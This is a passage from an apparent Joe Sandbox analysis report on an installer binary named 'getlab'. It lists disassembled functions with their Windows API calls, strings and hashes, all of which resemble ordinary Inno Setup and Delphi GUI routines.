                                                                          • Opcode ID: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                                          • Instruction ID: 27719b604a15c88968755e1a1929315a4e70c7568c957628d41e5ea0e69e6a26
                                                                          • Opcode Fuzzy Hash: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                                          • Instruction Fuzzy Hash: DD914434E001099BDF11EFA5D882BDEB7F5EF4834AF508066E90077292D778AE49CB58
                                                                          Function 004766E4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 0047673D
                                                                          • 73A259E0.USER32(00000000,000000FC,00476698,00000000,0047697C,?,00000000,004769A6), ref: 00476764
                                                                          • GetACP.KERNEL32(00000000,0047697C,?,00000000,004769A6), ref: 004767A1
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004767E7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A259ClassInfoMessageSend
                                                                          • String ID: COMBOBOX$Inno Setup: Language
                                                                          • API String ID: 3217714596-4234151509
                                                                          • Opcode ID: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                                          • Instruction ID: 91173772f4e079f50c7e0c6215708d31291a540b6063389a75a2ac3d3f1b2ee4
                                                                          • Opcode Fuzzy Hash: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                                          • Instruction Fuzzy Hash: 68814074A006059FCB10EF69C985AEAB7F5FB09304F56C0BAE808E7362D734AD45CB59
                                                                          Function 00408710 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408958,?,?,?,?,00000000,00000000,00000000,?,0040995F,00000000,00409972), ref: 0040872A
                                                                            • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                            • Part of subcall function 004085A4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087A6,?,?,?,00000000,00408958), ref: 004085B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                                          • Instruction ID: acf8fabd4b29bc0114a799655761a3ccdfd58ddc6ec536e3fe46e21ad76a8ffd
                                                                          • Opcode Fuzzy Hash: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                                          • Instruction Fuzzy Hash: 85515C24B001486BDB00FBA99E91A9E77A9DB84308F50C47FA151BB3C7CE3CDA05975D
                                                                          Function 004116EC Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersion.KERNEL32(00000000,004118F1), ref: 00411784
                                                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411842
                                                                            • Part of subcall function 00411AA4: CreatePopupMenu.USER32 ref: 00411ABE
                                                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118CE
                                                                            • Part of subcall function 00411AA4: CreateMenu.USER32 ref: 00411AC8
                                                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118B5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                          • String ID: ,$?
                                                                          • API String ID: 2359071979-2308483597
                                                                          • Opcode ID: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                                          • Instruction ID: d8c93b49542c4992b593f331124e59532eba8c65ca5fe63237d6ba0ca55a8ecc
                                                                          • Opcode Fuzzy Hash: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                                          • Instruction Fuzzy Hash: 9E510370A00245ABDB10EF6ADD816EA7BF9AF09304B15857BF904E73A2D738DD41CB58
                                                                          Function 0041BE5B Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF20
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF2F
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF80
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF8E
                                                                          • DeleteObject.GDI32(?), ref: 0041BF97
                                                                          • DeleteObject.GDI32(?), ref: 0041BFA0
                                                                          • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFBD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                          • String ID:
                                                                          • API String ID: 1030595962-0
                                                                          • Opcode ID: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                                          • Instruction ID: 4619fcafd17693633a8c31a92518bd0abdf88944d34ea3f3446ff31194e2e661
                                                                          • Opcode Fuzzy Hash: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                                          • Instruction Fuzzy Hash: 48510375A00219AFCF10DFA9C8819EEB7F9EF48314B11856AF914E7391D738AD81CB64
                                                                          Function 0041CED0 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEF6
                                                                          • 73A24620.GDI32(00000000,00000026), ref: 0041CF15
                                                                          • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF7B
                                                                          • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF8A
                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFF4
                                                                          • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D032
                                                                          • 73A18830.GDI32(?,?,00000001,0041D064,00000000,00000026), ref: 0041D057
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Stretch$A18830$A122A24620BitsMode
                                                                          • String ID:
                                                                          • API String ID: 430401518-0
                                                                          • Opcode ID: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                                          • Instruction ID: 9b717f45caa71cbdb3d7743a5068819f31981c945c02765ea0762fde20f1409d
                                                                          • Opcode Fuzzy Hash: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                                          • Instruction Fuzzy Hash: 17513F70604204AFDB14DFA8C985F9BBBF9EF08304F14459AB545E7692C778ED81CB58
                                                                          Function 004570FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,?,?), ref: 0045714E
                                                                            • Part of subcall function 00424274: GetWindowTextA.USER32(?,?,00000100), ref: 00424294
                                                                            • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                            • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571B5
                                                                          • TranslateMessage.USER32(?), ref: 004571D3
                                                                          • DispatchMessageA.USER32(?), ref: 004571DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                          • String ID: [Paused]
                                                                          • API String ID: 3047529653-4230553315
                                                                          • Opcode ID: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                                          • Instruction ID: 4dd0f6a69861fba71970a0c95394483262e0630457e8f7cd4854214566cc162d
                                                                          • Opcode Fuzzy Hash: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                                          • Instruction Fuzzy Hash: EC3196319082449EDB11DFB5EC81B9E7FB8EB49314F5544BBF800E7292D63C9909CB69
                                                                          Function 0046B240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursor.USER32(00000000,0046B37F), ref: 0046B2FC
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0046B30A
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B310
                                                                          • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B31A
                                                                          • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B320
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LoadSleep
                                                                          • String ID: CheckPassword
                                                                          • API String ID: 4023313301-1302249611
                                                                          • Opcode ID: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                                          • Instruction ID: dcef8ef75e700f151948083f515970cfb06be99f29bdf3d7051495a11b4a934f
                                                                          • Opcode Fuzzy Hash: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                                          • Instruction Fuzzy Hash: 9D3190347402049FD701EF69C899B9E7BE4EB49304F5580B6B904DB3A2E7789E80CB89
                                                                          Function 00477700 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00477628: GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                                            • Part of subcall function 00477628: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                                            • Part of subcall function 00477628: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                                          • SendMessageA.USER32(00000000,0000004A,00000000,00477ABA), ref: 00477735
                                                                          • GetTickCount.KERNEL32 ref: 0047777A
                                                                          • GetTickCount.KERNEL32 ref: 00477784
                                                                          • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004777D9
                                                                          Strings
                                                                          • CallSpawnServer: Unexpected response: $%x, xrefs: 0047776A
                                                                          • CallSpawnServer: Unexpected status: %d, xrefs: 004777C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                          • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                          • API String ID: 613034392-3771334282
                                                                          • Opcode ID: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                                          • Instruction ID: 5facb6da61392f64ef9a6a7cc904dffa3fea64199446eda4e4b81d1598b422a3
                                                                          • Opcode Fuzzy Hash: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                                          • Instruction Fuzzy Hash: 0131E474F042158ADF10EBB9C8467EEB6A09B08304F90807AB508EB382D67C5E01C79D
                                                                          Function 004595A4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045965F
                                                                          Strings
                                                                          • Fusion.dll, xrefs: 004595FF
                                                                          • CreateAssemblyCache, xrefs: 00459656
                                                                          • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045966A
                                                                          • .NET Framework CreateAssemblyCache function failed, xrefs: 00459682
                                                                          • Failed to load .NET Framework DLL "%s", xrefs: 00459644
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                          • API String ID: 190572456-3990135632
                                                                          • Opcode ID: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                                          • Instruction ID: ee3dd963a50cff277cc460556b086b348bcce4d3c12070cda944c03b6b96f9ce
                                                                          • Opcode Fuzzy Hash: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                                          • Instruction Fuzzy Hash: 5D315771E00609EBCB01EFA5C88169EB7A5AF44315F50857BE814A7382DB7C9E09CB99
                                                                          Function 0041C140 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0041C040: GetObjectA.GDI32(?,00000018), ref: 0041C04D
                                                                          • GetFocus.USER32 ref: 0041C160
                                                                          • 73A1A570.USER32(?), ref: 0041C16C
                                                                          • 73A18830.GDI32(?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C18D
                                                                          • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C199
                                                                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B0
                                                                          • 73A18830.GDI32(?,00000000,00000000,0041C1F2,?,?), ref: 0041C1D8
                                                                          • 73A1A480.USER32(?,?,0041C1F2,?,?), ref: 0041C1E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A18830$A122A480A570BitsFocusObject
                                                                          • String ID:
                                                                          • API String ID: 2231653193-0
                                                                          • Opcode ID: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                                          • Instruction ID: 42301c90dcb8571f5cbc3500225c3f0eaf81cc24073f805a24a28427ce123417
                                                                          • Opcode Fuzzy Hash: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                                          • Instruction Fuzzy Hash: D7116D71A44618BBDF00DBE9CC81FAFB7FCEB48700F14446AB518E7281DA3899008B28
                                                                          Function 00418C4C Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000E), ref: 00418C68
                                                                          • GetSystemMetrics.USER32(0000000D), ref: 00418C70
                                                                          • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C76
                                                                            • Part of subcall function 004099A8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CA4,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099AC
                                                                          • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CC6
                                                                          • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD1
                                                                          • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000), ref: 00418CE4
                                                                          • 6F530860.COMCTL32(0049B628,00418D07,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E), ref: 00418CFA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem$C400C740F530860F532980
                                                                          • String ID:
                                                                          • API String ID: 209721339-0
                                                                          • Opcode ID: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                                          • Instruction ID: c5403bac5749a6cea20ad86aefc03aeb17a2f2ee6000d3a37742d6553dc7a201
                                                                          • Opcode Fuzzy Hash: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                                          • Instruction Fuzzy Hash: 981124B1B44304BFDB10EBA9EC82F5E73B8DB48714F50406AB504EB2C2DAB99D408659
                                                                          Function 00483228 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004832E0), ref: 004832C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                          • API String ID: 47109696-2530820420
                                                                          • Opcode ID: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                                          • Instruction ID: b53b4caf4df369742718f420b864b5eadf64457ff5313130662490eff196aabe
                                                                          • Opcode Fuzzy Hash: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                                          • Instruction Fuzzy Hash: 7E115130704244AADB10FFA59852B5F7BA8DB55B05F6188B7A800A7282D7389E02871D
                                                                          Function 0041B45A Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                                          • DeleteDC.GDI32(?), ref: 0041B4D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$Delete$Stretch
                                                                          • String ID:
                                                                          • API String ID: 1458357782-0
                                                                          • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                          • Instruction ID: d121cbdfe682723b668f1aba97a5ca8eb2ba63952d9ca8216d3140e682204302
                                                                          • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                          • Instruction Fuzzy Hash: 46115C72E00619ABDB10DAD9DD85FEFB7BCEF08704F144555B614F7281C678AC418BA8
                                                                          Function 0042338C Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 004233A7
                                                                          • WindowFromPoint.USER32(?,?), ref: 004233B4
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233C2
